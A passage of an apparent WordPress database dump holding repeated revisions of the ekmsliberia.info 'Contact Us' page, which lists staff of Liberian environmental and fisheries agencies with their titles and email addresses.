</strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:29:17','2021-02-25 15:29:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3520,42,'2021-02-25 15:40:11','2021-02-25 15:40:11','','nafaa','','inherit','open','closed','','nafaa-2','','','2021-02-25 15:40:11','2021-02-25 15:40:11','',80,'https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png',0,'attachment','image/png',0),(3521,42,'2021-02-25 15:40:32','2021-02-25 15:40:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:40:32','2021-02-25 15:40:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3522,42,'2021-02-25 15:40:32','2021-02-25 15:40:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:40:32','2021-02-25 15:40:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3523,42,'2021-02-25 15:40:32','2021-02-25 15:40:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a 